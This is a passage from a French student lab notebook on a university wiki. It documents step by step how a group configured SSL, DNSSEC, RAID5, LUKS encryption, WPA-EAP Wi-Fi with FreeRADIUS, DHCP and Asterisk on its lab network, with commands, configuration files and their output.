                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 9e séance====&lt;br /&gt;
=====Serveur DHCP=====&lt;br /&gt;
Nous avons installé le paquet '''isc-dhcp-server'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons modifié le fichier de configuration du serveur DHCP''' /etc/dhcp/dhcpd.conf''':&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;option domain-name &amp;quot;speedflash.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.165;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.6.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.6.10 10.60.6.40;&lt;br /&gt;
      option routers 10.60.6.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite modifié le fichier '''/etc/default/isc-dhcp-server''' pour y ajouter wlan0 comme interface à prendre en compte.&lt;br /&gt;
Nous avons redémarré le serveur en lançant '''service isc-dhcp-server restart'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
En se connectant avec un smartphone en DHCP, nous arrivons à avoir une adresse IP : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:DHCP_iphone.png]] &amp;lt;br /&amp;gt;&lt;br /&gt;
et nous arrivons à la pinger depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.10&lt;br /&gt;
PING 10.60.6.10 (10.60.6.10) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=1 ttl=63 time=81.8 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=2 ttl=63 time=132 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=3 ttl=63 time=69.4 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====PCBX=====&lt;br /&gt;
Nous avons modifiés le fichier sip.conf :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[general]&lt;br /&gt;
hasvoicemail=yes&lt;br /&gt;
hassip=yes&lt;br /&gt;
hasiax=yes&lt;br /&gt;
callwaiting=yes&lt;br /&gt;
threewaycalling=yes&lt;br /&gt;
callwaitingcallerid=yes&lt;br /&gt;
transfer=yes&lt;br /&gt;
canpark=yes&lt;br /&gt;
cancallforward=yes&lt;br /&gt;
callreturn=yes&lt;br /&gt;
callgroup=1&lt;br /&gt;
pickupgroup=1&lt;br /&gt;
nat=yes&lt;br /&gt;
&lt;br /&gt;
[6001]&lt;br /&gt;
type=friend&lt;br /&gt;
host=dynamic&lt;br /&gt;
dtmfmode=rfc2833&lt;br /&gt;
disallow=all&lt;br /&gt;
allow=ulaw&lt;br /&gt;
fullname=ThomasStephane&lt;br /&gt;
username=trojSmaia&lt;br /&gt;
secret=secret&lt;br /&gt;
context=work&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis, nous avons modifiés le fichier /etc/asterisk/extensions.conf pour ajouter le contexte work à notre PCBX:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous n'avons pas encore testé cette solution.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35929</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35929"/>
				<updated>2016-12-12T11:08:17Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Travail réalisé la 9e séance */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | Configuration DHCP - PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
